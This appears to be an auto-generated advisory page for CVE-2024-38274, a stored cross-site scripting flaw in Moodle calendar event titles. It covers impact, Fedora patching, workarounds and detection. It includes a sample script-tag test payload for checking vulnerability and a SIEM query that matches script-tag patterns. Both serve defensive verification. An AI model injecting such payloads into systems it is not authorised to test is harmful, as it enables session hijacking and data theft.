CVE-2024-38274
📋 TL;DR
This vulnerability allows attackers to inject malicious scripts into calendar event titles, which execute when users view the deletion prompt. This stored cross-site scripting (XSS) affects users of vulnerable calendar applications, potentially compromising their sessions or stealing sensitive data.
💻 Affected Systems
- Moodle
📦 What is this software?
Fedora by Fedoraproject
Fedora by Fedoraproject
Moodle by Moodle
Moodle by Moodle
Moodle by Moodle
Moodle by Moodle
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal session cookies, perform actions as authenticated users, redirect to malicious sites, or install malware on user systems.
Likely Case
Session hijacking, credential theft, or unauthorized actions within the application context.
If Mitigated
Limited impact if proper content security policies, input validation, and output encoding are implemented.
🎯 Exploit Status
Exploitation requires ability to create or modify calendar events with malicious titles.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Check Fedora security updates for patched package versions.
Vendor Advisory: https://moodle.org/mod/forum/discuss.php?d=459499
Restart Required: No
Instructions:
1. Update Moodle to the latest patched version. 2. Apply Fedora security updates via 'sudo dnf update moodle'. 3. Verify the fix by testing calendar event deletion prompts.
🔧 Temporary Workarounds
Input Validation Enhancement
allImplement strict input validation for calendar event titles to reject or sanitize HTML/script content.
Content Security Policy (CSP)
allDeploy a strict CSP to mitigate XSS impact by restricting script execution sources.
🧯 If You Can't Patch
- Disable calendar event creation/modification for untrusted users.
- Implement web application firewall (WAF) rules to block XSS payloads in event titles.
🔍 How to Verify
Check if Vulnerable:
Test by creating a calendar event with a script payload (e.g., <script>alert('test')</script>) and check if it executes in the deletion prompt.Check Version:
On Fedora: 'rpm -q moodle' or check Moodle admin panel for version.Verify Fix Applied:
After patching, repeat the test; the script should be properly escaped and not execute.📡 Detection & Monitoring
Log Indicators:
- Unusual calendar event creations/modifications with script-like content in titles.
Network Indicators:
- HTTP requests containing script tags in calendar-related parameters.
SIEM Query:
source="web_logs" AND (uri_path="/calendar/" OR uri_path="/event/") AND (param="title" CONTAINS "<script>" OR param="title" CONTAINS "javascript:")🔗 References
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/F7AZYR7EXV6E5SQE2GYTNQE3NOENJCQ6/
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GHTIX55J4Q4LEOMLNEA4OZSWVEENQX7E/
- https://moodle.org/mod/forum/discuss.php?d=459499
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/F7AZYR7EXV6E5SQE2GYTNQE3NOENJCQ6/
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GHTIX55J4Q4LEOMLNEA4OZSWVEENQX7E/
- https://moodle.org/mod/forum/discuss.php?d=459499
